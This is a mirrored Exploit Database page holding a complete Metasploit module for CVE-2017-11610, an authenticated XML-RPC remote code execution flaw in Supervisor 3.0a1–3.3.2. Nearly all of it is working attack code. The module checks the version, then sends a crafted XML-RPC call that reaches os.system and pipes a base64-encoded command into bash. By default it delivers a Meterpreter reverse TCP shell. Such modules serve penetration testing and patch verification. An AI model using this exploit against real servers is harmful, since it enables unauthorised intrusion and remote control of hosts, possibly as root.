Supervisor 3.0a1 < 3.3.2 - XML-RPC (Authenticated) Remote Code Execution (Metasploit)

• Exploit Database
• 14 阅读

• 作者： Metasploit
  日期： 2017-09-25
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/42779/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "Supervisor XML-RPC Authenticated Remote Code Execution",
  'Description'=> %q{
  This module exploits a vulnerability in the Supervisor process control software, where an authenticated client
  can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.
  The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this
  may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been
  configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Calum Hutton <c.e.hutton@gmx.com>'
  ],
  'References' =>
  [
  ['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
  ['URL', 'https://www.debian.org/security/2017/dsa-3942'],
  ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'],
  ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
  ['CVE', '2017-11610']
  ],
  'Platform' => 'linux',
  'Targets'=>
  [
  ['3.0a1-3.3.2', {}]
  ],
  'Arch' => [ ARCH_X86, ARCH_X64 ],
  'DefaultOptions' =>
  {
  'RPORT' => 9001,
  'Payload' => 'linux/x64/meterpreter/reverse_tcp',
  },
  'Privileged' => false,
  'DisclosureDate' => 'Jul 19 2017',
  'DefaultTarget'=> 0
  ))
  
  register_options(
  [
  Opt::RPORT(9001),
  OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),
  OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),
  OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),
  ]
  )
  end
  
  def check_version(version)
  if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')
  return true
  else
  return false
  end
  end
  
  def check
  
  print_status('Extracting version from web interface..')
  
  params = {
  'method'=> 'GET',
  'uri' => normalize_uri('/')
  }
  if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
  print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
  params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
  end
  res = send_request_cgi(params)
  
  if res
  if res.code == 200
  match = res.body.match(/<span>(\d+\.[\dab]\.\d+)<\/span>/)
  if match
  version = Gem::Version.new(match[1])
  if check_version(version)
  print_good("Vulnerable version found: #{version}")
  return Exploit::CheckCode::Appears
  else
  print_bad("Version #{version} is not vulnerable")
  return Exploit::CheckCode::Safe
  end
  else
  print_bad('Could not extract version number from web interface')
  return Exploit::CheckCode::Unknown
  end
  elsif res.code == 401
  print_bad("Authentication failed: #{res.code} response")
  return Exploit::CheckCode::Safe
  else
  print_bad("Unexpected HTTP code: #{res.code} response")
  return Exploit::CheckCode::Unknown
  end
  else
  print_bad('Error connecting to web interface')
  return Exploit::CheckCode::Unknown
  end
  
  end
  
  def execute_command(cmd, opts = {})
  
  # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server
  # Credit to the following urls for the os.system() payload
  # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610
  # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
  xml_payload = %{<?xml version="1.0"?>
  <methodCall>
  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
  <params>
  <param>
  <string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 &</string>
  </param>
  </params>
  </methodCall>}
  
  # Send the XML-RPC payload via POST to the specified endpoint
  endpoint_path = target_uri.path
  print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}")
  
  params = {
  'method'=> 'POST',
  'uri' => normalize_uri(endpoint_path),
  'ctype' => 'text/xml',
  'headers' => {'Accept' => 'text/xml'},
  'data'=> xml_payload,
  'encode_params' => false
  }
  if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
  print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
  params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
  end
  return send_request_cgi(params, timeout=5)
  
  end
  
  def exploit
  
  res = execute_cmdstager(:linemax => 800)
  
  if res
  if res.code == 401
  fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response")
  elsif res.code == 404
  fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response")
  else
  fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response")
  end
  else
  print_good('Request returned without status code, usually indicates success. Passing to handler..')
  handler
  end
  
  end
  
  end